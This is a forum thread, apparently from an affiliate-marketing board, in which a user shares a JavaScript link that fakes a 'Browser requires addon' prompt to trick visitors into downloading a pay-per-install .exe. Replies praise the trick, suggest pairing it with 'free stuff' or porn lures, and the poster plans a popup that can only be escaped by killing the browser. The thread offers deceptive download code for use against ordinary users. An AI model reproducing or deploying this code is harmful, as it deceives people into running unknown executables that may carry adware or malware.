Annoying Javascript pop for youtube landing pages

Status
Not open for further replies.

jake3340

Supreme Member
Joined
Nov 20, 2008
Messages
1,439
Reaction score
437
For those wanting to make a landing page promoting PPI affiliates, Here is a little code i made that will make a JavaScript pop up tricking the person he needs to download the PPI install exe file to view your webpage.


<a href="javascript: if (confirm('Browser requires addon to view this website, click continue to download addon.')) { window.location.href='www.yourlinktodownload.com/something.exe' } else { void('') };">Text to be viewed on Webpage</a> </p>
<div align="center">
 
Search on the youtube section on the forum and those landing pages you see where they make you install a ppi exe. Im using youtube as an example because these type of scripts that are implemented in a website are getting traffic from youtube.
 
Looks good except that 'Javascript application' title on the window that pops up, but still workable :)

great share thanks!
 
thanks, this is pretty useful, especially when giving out free stuffs or even porn :)
 
I will try come up with a way to make the popup keep popping up and only way to close it is by ending the process of the browser. Im a newb at javascript but il do some research, will post if i find out how.
 
Status
Not open for further replies.
Back
Top